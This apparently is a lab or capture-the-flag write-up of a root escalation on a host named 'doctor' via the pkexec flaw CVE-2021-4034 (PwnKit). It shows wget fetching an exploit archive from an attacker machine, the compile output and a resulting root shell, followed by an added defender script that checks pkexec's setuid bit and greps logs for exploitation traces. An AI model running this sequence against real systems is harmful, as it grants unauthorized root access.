CVE-2021-4034


PEAS reported that the target system is vulnerable to CVE-2021-4034.

The vulnerable program is part of Polkit, which manages process privileges. Polkit's pkexec lets non-privileged processes communicate with privileged ones and provides a mechanism for legitimate, authorized privilege escalation similar to sudo.

A memory corruption flaw is triggered when pkexec is run with no arguments. By manipulating environment variables, an attacker can make pkexec load and execute arbitrary code with superuser privileges.

Exploit (PwnKit):


I found an exploit online

Exploitation


web@doctor:/dev/shm/$ wget http://10.10.14.10:8000/kernelbuster/CVE-2021-4034.tar.gz
web@doctor:/dev/shm/$ tar -xvf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

web@doctor:/dev/shm/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.

Compile

web@doctor:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
doctor
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.209  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:a8d6  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:a8d6  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:a8:d6  txqueuelen 1000  (Ethernet)
        RX packets 161736  bytes 21518480 (21.5 MB)
        RX errors 0  dropped 83  overruns 0  frame 0
        TX packets 167268  bytes 161821471 (161.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 724046  bytes 190390893 (190.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 724046  bytes 190390893 (190.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise
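The run above ends in a root shell. As an added example (not from the writeup or the exploit), this is what a defender checks on such a host: whether pkexec is still setuid root, which is the precondition for the escalation and is removed by the stop-gap `chmod 0755`, and whether pkexec's own environment sanity checks left their tell-tale messages in the auth log. The sample log lines are constructed; GNU stat is assumed.

```shell
#!/bin/sh
# Added defender-side example (not the writeup's or the exploit's code).
# Two checks for CVE-2021-4034: is pkexec still setuid root on this host, and
# did pkexec log the messages its environment sanity checks emit when a crafted
# environment passes through it. Assumes GNU stat and a syslog-style auth log.

# Pure check: MODE is octal as printed by `stat -c %a`, UID is the owner's uid.
# Returns 0 when the setuid bit (04000) is set and the owner is root.
setuid_root() {
    [ "$2" = "0" ] || return 1
    case "$1" in 4???|5???|6???|7???) return 0 ;; *) return 1 ;; esac
}

# Gather mode and owner of a binary (default /usr/bin/pkexec) and run the check.
pkexec_exposed() {
    f="${1:-/usr/bin/pkexec}"
    [ -f "$f" ] || return 1
    setuid_root "$(stat -c '%a' "$f")" "$(stat -c '%u' "$f")"
}

# Detection: pkexec's own checks log these two messages (the second with the
# upstream typo "suscipious") when it is invoked with an unsafe environment.
# Prints the matching lines and returns 0 if there is at least one.
pkexec_log_hits() {
    grep -E 'pkexec\[[0-9]+\].*(SHELL variable was not found|contains susc[a-z]*ious content)' "$1"
}

# Constructed sample log (syslog prefix plus pkexec's log_message layout).
SAMPLE_LOG=$(mktemp)
cat >"$SAMPLE_LOG" <<'EOF'
Jan 26 10:01:02 doctor sshd[1201]: Accepted publickey for web from 10.10.14.10 port 50122 ssh2
Jan 26 10:02:15 doctor pkexec[1337]: web: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/dev/shm/CVE-2021-4034] [COMMAND=GCONV_PATH=./pwnkit.so:.]
Jan 26 10:02:31 doctor pkexec[1352]: web: The value for environment variable XAUTHORITY contains suscipious content [USER=root] [TTY=unknown] [CWD=/dev/shm/CVE-2021-4034] [COMMAND=GCONV_PATH=./pwnkit.so:.]
Jan 26 10:03:40 doctor pkexec[1400]: web: Executing command [USER=root] [TTY=/dev/pts/0] [CWD=/home/web] [COMMAND=/usr/bin/systemctl status]
EOF

if pkexec_exposed; then
    echo "pkexec is setuid root: patch polkit, or as a stop-gap drop the bit: chmod 0755 /usr/bin/pkexec"
else
    echo "pkexec absent or not setuid root: CVE-2021-4034 cannot yield root here"
fi
echo "suspicious pkexec log lines in sample:"
pkexec_log_hits "$SAMPLE_LOG" || echo "(none)"
```

Point `pkexec_log_hits` at `/var/log/auth.log` (or `journalctl -t pkexec` output) on a real host; the version string from `pkexec --version` is not a reliable patch indicator because distributions backport the fix without bumping it.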